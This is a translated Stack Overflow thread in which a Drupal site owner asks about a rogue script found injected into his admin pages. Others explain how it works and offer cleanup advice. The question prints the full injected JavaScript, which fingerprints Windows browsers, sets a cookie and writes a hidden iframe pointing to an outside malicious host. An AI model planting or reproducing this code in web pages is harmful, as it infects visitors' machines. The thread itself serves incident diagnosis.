logo标签列表

为什么Drupal网站上出现了“103fm”脚本?

javascripthtmldrupal
6

可能是重复问题:
我的网站DOM中出现奇怪的脚本

我刚刚注意到在我的网站DOM中运行了一个奇怪的脚本。我正在运行DRUPAL。该脚本是http://www.103fm.net/release.js。我不知道从哪里开始寻找这个流氓脚本。我的网站是moloads.com,只发生在管理员菜单中。奇怪的是该文件在103fm.net上不存在,但它实际上加载了以下脚本:

var BrowserDetect = {
init: function() {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
searchString: function(data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
searchVersion: function(dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
dataBrowser: [{
string: navigator.userAgent,
subString: "Firefox",
identity: "Firefox"
}, {
string: navigator.userAgent,
subString: "MSIE",
identity: "Explorer",
versionSearch: "MSIE"
}],
dataOS: [{
string: navigator.platform,
subString: "Win",
identity: "Windows"
}]
};
function addCookie(szName, szValue, dtDaysExpires) {
var dtExpires = new Date();
var dtExpiryDate = "";
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
dtExpiryDate = dtExpires.toGMTString();
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
function findCookie(szName) {
var i = 0;
var nStartPosition = 0;
var nEndPosition = 0;
var szCookieString = document.cookie;
while (i <= szCookieString.length) {
nStartPosition = i;
nEndPosition = nStartPosition + szName.length;
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
nStartPosition = nEndPosition + 1;
nEndPosition = document.cookie.indexOf(";", nStartPosition);
if (nEndPosition < nStartPosition)
nEndPosition = document.cookie.length;
return document.cookie.substring(nStartPosition, nEndPosition);
break;
}
i++;
}
return "";
}
BrowserDetect.init();
var szCookieString = document.cookie;
var stopit = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) {
addCookie("geo_id2", "753445", 1);
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>");
} else {}
4
我的另一个问题被关闭了,所以我创建了一个新的带有更多信息的问题。 - George Milonas
实际上,该脚本正在客户端浏览器上写入幽灵Cookie(这也是我尚未打开您的网站的原因),并通过document.write调用将其传递到自己的数据库中。 - hjpotter92
封闭问题中的一些建议是有价值的。获取一个好的文本搜索程序(或者使用grep),并搜索脚本。同时确保您已更改了所有密码:如果您还没有添加该脚本——例如通过安装恶意插件——那么其他人可能已经添加了它。 - Andrew Leach
1个回答
1
同样地,我们的客户服务器昨晚被罗马尼亚、捷克共和国和波兰的IP地址入侵。这些看似自动化的过程似乎会在body标签顶部注入一个脚本标签。该脚本似乎会在运行Firefox和IE的Windows机器上生成一个cookie。然后它会打开一个iframe并运行在俄罗斯托管的网站上运行的CGI脚本。
幸运的是,最新版本的Firefox甚至不会加载该脚本;但IE会。
Chrome(尽管没有受到影响)甚至不允许您访问发生此情况的页面。
由于我能找到的所有报告都是最近发生的,所以很可能是软件漏洞,而不是被攻击者盗用的密码——您正在运行什么FTP服务器(使用FTP客户端连接到服务器,控制台应该会告诉您)。涉及的服务器正在运行ProFTPd 1.3.1。
如果该软件很常见,则应通知其创建者。
我让Hostgator来解决这个问题...所有我的域名都被感染了。然后每一个域名都被Google标记为恶意软件。幸运的是,他们成功清除了病毒,但我仍在等待Google解除对我的网站的封锁。=/ - George Milonas
网页内容由stack overflow 提供, 点击上面的
可以查看英文原文,
原文链接